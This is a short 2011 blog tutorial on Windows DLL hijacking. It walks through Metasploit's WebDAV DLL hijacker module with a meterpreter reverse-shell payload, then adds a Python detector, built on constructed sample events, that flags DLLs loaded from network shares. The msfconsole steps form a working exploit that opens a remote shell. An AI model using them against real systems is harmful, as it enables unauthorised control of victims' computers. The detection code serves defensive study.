Saturday 30 April 2011

DLL Hijacking

This vulnerability is triggered when a file of a vulnerable type is opened from the server that is hosting the files.
Usually the user has to browse into the directory and open the file; this can be any file, even a blank one with nothing inside.
The flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory, and then we get our
shell. So let's do this one.

1) open msfconsole
msf> search webdav.dll
msf> use windows/browser/webdav_dll_hijacker
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set BASENAME reports
msf> set EXTENSIONS grp
msf> set LHOST 192.168.1.69
msf> set SRVHOST 192.168.1.69
msf> set LPORT 8888
msf> set SRVPORT 80
msf> set SHARENAME documents
msf> exploit
Now go to the client, browse to file://192.168.1.69/ and click on any file.
Done, you have your shell.
msf> sessions

Now, go to this website to see the list of all apps that are vulnerable
http://vupen.com/english/searchengine.php?keyword=insecure+library+loading
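
On the defending side, the load described above leaves a recognisable trace: a locally installed program maps a DLL whose path is a remote or WebDAV share. The following is an added example, not part of the original post, that flags such loads. The record layout (Image, ImageLoaded) is a simplified assumption modelled on image-load telemetry, and the hosts, paths and file names are constructed sample data.

```python
import re

# UNC path matcher. Group "dav" is non-empty for the Windows WebDAV redirector
# forms \\host@80\share and \\host@SSL@443\share; \\host\DavWWWRoot\... is
# checked separately in classify().
UNC = re.compile(r"^\\\\(?P<host>[^\\@]+)(?P<dav>(?:@SSL)?(?:@\d+)?)\\(?P<rest>.*)$", re.I)

def classify(path):
    """Return 'local', 'unc' or 'webdav' for a Windows file path."""
    m = UNC.match(path)
    if not m:
        return "local"
    if m.group("dav") or m.group("rest").lower().startswith("davwwwroot"):
        return "webdav"
    return "unc"

def find_remote_dll_loads(events):
    """Flag DLLs mapped from a remote path into a locally installed process."""
    hits = []
    for ev in events:
        loaded = ev["ImageLoaded"]
        if not loaded.lower().endswith(".dll"):
            continue  # the process image itself and other file types are ignored
        origin = classify(loaded)
        # A program that itself runs from a share loads its own DLLs from there,
        # so only local programs pulling in remote DLLs are reported.
        if origin != "local" and classify(ev["Image"]) == "local":
            hits.append({"process": ev["Image"], "dll": loaded, "origin": origin})
    return hits

# Constructed sample records (not real telemetry).
VIEWER = r"C:\Program Files\Viewer\viewer.exe"
SAMPLE = [
    {"Image": VIEWER, "ImageLoaded": VIEWER},
    {"Image": VIEWER, "ImageLoaded": r"C:\Windows\System32\version.dll"},
    {"Image": VIEWER, "ImageLoaded": r"\\files.example@80\documents\helper.dll"},
    {"Image": VIEWER, "ImageLoaded": r"\\files.example\DavWWWRoot\documents\helper.dll"},
    {"Image": VIEWER, "ImageLoaded": r"\\nas.example\share\helper.dll"},
    {"Image": r"\\nas.example\tools\tool.exe", "ImageLoaded": r"\\nas.example\tools\plugin.dll"},
]

if __name__ == "__main__":
    for hit in find_remote_dll_loads(SAMPLE):
        print(f'{hit["origin"]:7} {hit["process"]} <- {hit["dll"]}')
```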
